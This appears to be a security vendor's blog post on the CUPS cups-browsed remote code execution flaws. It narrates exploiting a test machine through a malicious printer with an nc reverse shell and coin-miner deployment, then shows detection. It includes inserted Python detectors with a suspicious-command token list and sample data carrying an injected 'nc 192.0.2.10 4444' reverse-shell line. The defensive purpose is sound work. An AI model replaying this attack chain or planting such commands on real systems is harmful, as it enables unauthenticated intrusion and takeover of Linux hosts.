
A series of critical-severity bugs in the CUPS printer discovery mechanism (cups-browsed) affecting Linux hosts was recently disclosed. The vulnerabilities can be leveraged to automatically install a malicious printer and perform unauthenticated remote code execution attacks. Details of the vulnerabilities, as well as exploit code, are already available in the public domain. Uptycs released details about the vulnerabilities here.

In this blog we want to showcase how Uptycs detects and remediates exploitation attempts on a vulnerable machine.

CUPS Exploitation

For the purpose of exploitation, we used this PoC.

From the attacker machine, we run the exploit script to advertise our malicious printer, named “BestPrinter”, which executes the nc command to open a reverse shell, as shown in the image below.

Fig 1. Running the exploit script

The above command creates a multicast DNS query packet for advertising the malicious printer.

On the victim machine, when we try to print a page from Firefox, the malicious printer appears in the printer list.

Fig 2. Malicious printer appears in victim machine

In the background, the victim host generates an IPP (Internet Printing Protocol) request to fetch more attributes about the printer. The exploit script responds with a crafted IPP response carrying the exploit command in the “FoomaticRIPCommandLine” field. This essentially tells CUPS to execute the foomatic-rip filter binary, and with it the injected command, when a print job is sent to this printer. A malicious temporary PPD (PostScript Printer Description) file for the printer is generated from this response.

Fig 3. IPP request and response containing exploit command

The victim has to manually click the “Print” button to trigger the exploitation.
The exploit runs successfully and spawns a reverse shell. We then execute further commands to gather system information, set cron jobs and deploy CoinMiner.
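The temporary PPD described above is the artifact a defender can hunt for on a host: the injected command lives in the PPD's FoomaticRIPCommandLine directive. The following is an added example, not code from the Uptycs post or from the PoC, that parses PPD files for that directive and flags values containing tokens a print pipeline has no reason to use. The /etc/cups/ppd default path, the suspicious-token patterns and the two sample PPDs are assumptions constructed for the example; the patterns are a hunting heuristic and should be tuned against the PPDs actually deployed in your fleet.

```python
"""Hunt for PPD files whose *FoomaticRIPCommandLine carries an injected command.

Added example for illustration; not Uptycs code and not part of the PoC.
"""
import re
import sys
from pathlib import Path
from typing import Dict, List

# A PPD string directive is `*Key: "value"`; the quoted value may span lines.
DIRECTIVE_RE = re.compile(r'^\*(\w+):\s*"(.*?)"', re.MULTILINE | re.DOTALL)

# Patterns a legitimate RIP command line has no reason to contain (assumed
# list; tune it against the PPDs in your own fleet before relying on it).
SUSPICIOUS_PATTERNS = (
    r"\bnc\b", r"\bncat\b", r"/dev/tcp/", r"\bbash -i\b", r"\bcurl\b",
    r"\bwget\b", r"\bbase64\b", r"\bpython3? -c\b", r"\bperl -e\b",
)

# Constructed sample PPDs (not captured from the exploit run).
BENIGN_PPD = '''*PPD-Adobe: "4.3"
*NickName: "Generic PostScript Printer"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dPARANOIDSAFER -dNOPAUSE
 -sDEVICE=ljet4 -sOutputFile=- -"
'''

SUSPICIOUS_PPD = '''*PPD-Adobe: "4.3"
*NickName: "BestPrinter"
*FoomaticRIPCommandLine: "nc 192.0.2.10 4444"
'''


def parse_ppd(text: str) -> Dict[str, List[str]]:
    """Return every single-word directive's values, with continuation lines joined."""
    directives: Dict[str, List[str]] = {}
    for key, value in DIRECTIVE_RE.findall(text):
        directives.setdefault(key, []).append(" ".join(value.split()))
    return directives


def rip_command_findings(text: str) -> List[dict]:
    """Flag FoomaticRIPCommandLine values that match any suspicious pattern."""
    findings = []
    for cmd in parse_ppd(text).get("FoomaticRIPCommandLine", []):
        hits = [pat for pat in SUSPICIOUS_PATTERNS if re.search(pat, cmd)]
        if hits:
            findings.append({"command": cmd, "tokens": hits})
    return findings


def scan_ppd_dir(directory: Path) -> List[dict]:
    """Scan every *.ppd file in `directory` (CUPS keeps installed PPDs in /etc/cups/ppd)."""
    results = []
    for ppd in sorted(directory.glob("*.ppd")):
        for finding in rip_command_findings(ppd.read_text(errors="replace")):
            results.append({"file": str(ppd), **finding})
    return results


if __name__ == "__main__":
    target = Path(sys.argv[1] if len(sys.argv) > 1 else "/etc/cups/ppd")
    results = scan_ppd_dir(target) if target.is_dir() else []
    for r in results:
        print(f"{r['file']}: {r['tokens']} in {r['command']!r}")
    # Self-check on the constructed samples.
    print("benign:", rip_command_findings(BENIGN_PPD))
    print("suspicious:", rip_command_findings(SUSPICIOUS_PPD))
```

Run it with no arguments on a host to inspect the installed PPDs, or pass another directory. A hit is a lead for review rather than a verdict: legitimate Foomatic PPDs do contain full shell pipelines, so the useful signal is a command that reaches for network or scripting tools, not the mere presence of the directive.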

Fig 4. Reverse shell connection is established

Fig 5. Post exploitation activities

Vulnerability Detection

Uptycs automatically scans the entire infrastructure (hosts, containers, images and Lambda functions) for impact and surfaces the results on a dashboard.

Fig 6. Trending Vulnerabilities

You can get a detailed vulnerability report by double-clicking the vulnerability.

Fig 7. Vulnerability Scan Report for CUPS CVEs.

Vulnerabilities are prioritized by evaluating the environment in which each vulnerability is found: whether the asset is exposed to the internet, whether a process from the vulnerable package is currently running, and whether that process is running in privileged mode. The mere presence of a vulnerable package is lower priority than a running process from that package, and the priority rises again if that process runs as a privileged user. If the asset is exposed to the internet (receiving inbound connections from public IP addresses), the priority is increased further.

Fig 8. Vulnerable process and package details

Uptycs does not stop at just detecting the vulnerability. Our customers' infrastructure is protected from attackers leveraging the vulnerability to commit malicious activity.

Alerts Triggered in Uptycs

Uptycs detects exploitation activity and protects users from being attacked. In Protect mode, Uptycs blocks the exploitation at its initial stage by killing the malicious process launched by the attacker, stopping the attacker from compromising the target machine. In Detect mode, the exploitation is not blocked, but all of the attacker's activity is alerted on and deep telemetry is collected for investigators to conduct forensics.

Exploitation in Protect Mode

When Uptycs is configured in Protect mode, the attack is stopped when the exploit script's reverse shell is executed.

Fig 9. Attack is blocked in Protect mode

Fig 10. Detection view in Protect mode

Exploitation in Detect Mode

When we performed the attack in Detect mode, we see the full attack chain: the foomatic-rip process, whose parent is the cupsd process, launches bash to execute the reverse shell and the CoinMiner.
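The process tree described above (cupsd → foomatic-rip → bash → reverse shell) is what a detection rule should key on. Here is an added example, not Uptycs' own detection logic, that walks constructed process telemetry, finds shells whose ancestry passes through cupsd and foomatic-rip, and reports any descendant that is not a known renderer. Because foomatic-rip normally runs its RIP command line through a shell, the rule judges what that shell goes on to execute rather than the shell itself. The renderer allowlist, the event field names and the sample events are assumptions made for this example; build the allowlist from a baseline of your own print servers.

```python
"""Detect abuse of the cupsd -> foomatic-rip -> shell chain from process telemetry.

Added example for illustration; not Uptycs' own detection logic.
"""
from typing import Dict, List, Set

SHELLS: Set[str] = {"bash", "sh", "dash", "zsh"}
PRINT_FILTERS: Set[str] = {"foomatic-rip"}
# Binaries a RIP shell under foomatic-rip is expected to launch (assumed
# allowlist; derive it from a baseline of your own print servers).
RENDERER_ALLOWLIST: Set[str] = {"gs", "pdftops"}

# Constructed sample telemetry modelled on the attack chain in the post
# (not a real capture). Fields: pid, ppid, name (comm), cmdline.
SAMPLE_EVENTS = [
    {"pid": 1,   "ppid": 0,   "name": "systemd",      "cmdline": "/sbin/init"},
    {"pid": 800, "ppid": 1,   "name": "cupsd",        "cmdline": "/usr/sbin/cupsd -l"},
    {"pid": 801, "ppid": 1,   "name": "cups-browsed", "cmdline": "/usr/sbin/cups-browsed"},
    # Malicious job: filter shell runs the injected command from the PPD.
    {"pid": 900, "ppid": 800, "name": "foomatic-rip", "cmdline": "foomatic-rip 1 user job 1"},
    {"pid": 901, "ppid": 900, "name": "bash",         "cmdline": "bash -c nc 192.0.2.10 4444"},
    {"pid": 902, "ppid": 901, "name": "nc",           "cmdline": "nc 192.0.2.10 4444"},
    # Benign job: filter shell runs Ghostscript.
    {"pid": 910, "ppid": 800, "name": "foomatic-rip", "cmdline": "foomatic-rip 2 user job 1"},
    {"pid": 911, "ppid": 910, "name": "bash",         "cmdline": "bash -c gs -q -dBATCH -sOutputFile=- -"},
    {"pid": 912, "ppid": 911, "name": "gs",           "cmdline": "gs -q -dBATCH -sOutputFile=- -"},
    # Interactive user shell running nc: not under cupsd, so out of scope here.
    {"pid": 950, "ppid": 1,   "name": "bash",         "cmdline": "-bash"},
    {"pid": 951, "ppid": 950, "name": "nc",           "cmdline": "nc -l 8080"},
]


def ancestry(by_pid: Dict[int, dict], pid: int, max_depth: int = 64) -> List[str]:
    """Process names from the root ancestor down to `pid` (cycle- and depth-guarded)."""
    chain: List[str] = []
    seen: Set[int] = set()
    cur = by_pid.get(pid)
    while cur is not None and cur["pid"] not in seen and len(chain) < max_depth:
        seen.add(cur["pid"])
        chain.append(cur["name"])
        cur = by_pid.get(cur["ppid"])
    return list(reversed(chain))


def descendants(children: Dict[int, List[dict]], pid: int) -> List[dict]:
    """All processes below `pid` in the tree (iterative DFS)."""
    out: List[dict] = []
    stack = list(children.get(pid, []))
    while stack:
        proc = stack.pop()
        out.append(proc)
        stack.extend(children.get(proc["pid"], []))
    return out


def under_print_filter(chain: List[str]) -> bool:
    """True when cupsd is the direct parent of a print filter somewhere in the chain."""
    return any(chain[i] == "cupsd" and chain[i + 1] in PRINT_FILTERS
               for i in range(len(chain) - 1))


def detect_cups_filter_abuse(events: List[dict]) -> List[dict]:
    """Report shells under cupsd -> foomatic-rip that spawn non-renderer binaries."""
    by_pid = {e["pid"]: e for e in events}
    children: Dict[int, List[dict]] = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)

    findings = []
    for e in events:
        if e["name"] not in SHELLS:
            continue
        chain = ancestry(by_pid, e["pid"])
        if not under_print_filter(chain):
            continue
        unexpected = sorted({d["name"] for d in descendants(children, e["pid"])
                             if d["name"] not in RENDERER_ALLOWLIST | SHELLS})
        if unexpected:
            findings.append({"shell_pid": e["pid"], "chain": chain,
                             "cmdline": e["cmdline"], "unexpected_children": unexpected})
    return findings


if __name__ == "__main__":
    for finding in detect_cups_filter_abuse(SAMPLE_EVENTS):
        print(" -> ".join(finding["chain"]), "spawned", finding["unexpected_children"],
              "via", repr(finding["cmdline"]))
```

On the sample data only the shell under the malicious job is reported; the Ghostscript job under the same cupsd parent and the interactive user shell running nc are both left alone, which is the distinction an analyst wants when the same rule runs across a fleet of print servers. Feeding it real telemetry only requires mapping your agent's process events onto the four fields used here.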

Fig 11. Detection view in Detect mode

Connect with our Team

The Uptycs team is ready to help. If you would like to learn more about the Uptycs Platform, speak to one of our experts, and see a demo of how to investigate and remediate issues like this one, contact us today.